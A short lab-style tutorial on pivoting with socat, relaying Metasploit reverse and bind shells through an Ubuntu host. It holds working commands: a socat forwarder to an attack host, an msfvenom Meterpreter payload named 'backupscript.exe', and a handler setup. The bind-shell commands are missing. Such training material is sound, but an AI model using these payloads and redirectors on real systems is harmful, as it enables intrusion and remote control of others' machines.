Playing Pong with Socat

Socat Redirection with a Reverse Shell

Socat is a bidirectional relay tool that can create pipe sockets between 2 independent network channels without needing to use SSH tunneling.

We can start Metasploit's listener using the same command mentioned in the last section on our attack host, and we can start socat on the Ubuntu server.

socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

Socat will listen on localhost on port 8080 and forward all the traffic to port 80 on our attack host (10.10.14.18).

We then create a payload for the Windows target that points at the Ubuntu server running socat and start our multi_handler on the attack machine

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<UbuntuIP> -f exe -o backupscript.exe LPORT=8080

(we need port 80)

sudo msfconsole

msf6 > use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 80
run

We can test this by running our payload on the windows host again, and we should see a network connection from the Ubuntu server this time.

Socat Redirection with a Bind Shell

Similar to our socat's reverse shell redirector, we can also create a socat bind shell redirector. This is different from reverse shells that connect back from the Windows server to the Ubuntu server and get redirected to our attack host.

In the case of bind shells, the Windows server will start a listener and bind to a particular port. We can create a bind shell payload for Windows and execute it on the Windows host.

At the same time, we can create a socat redirector on the Ubuntu server, which will listen for incoming connections from a Metasploit bind handler and forward that to a bind shell payload on a Windows target. The below figure should explain the pivot in a much better way.

Creating the Windows Payload

We can start a socat bind shell listener, which listens on port 8080 and forwards packets to Windows server 8443.

172.16.5.19 is the Windows IP

Establishing Meterpreter Session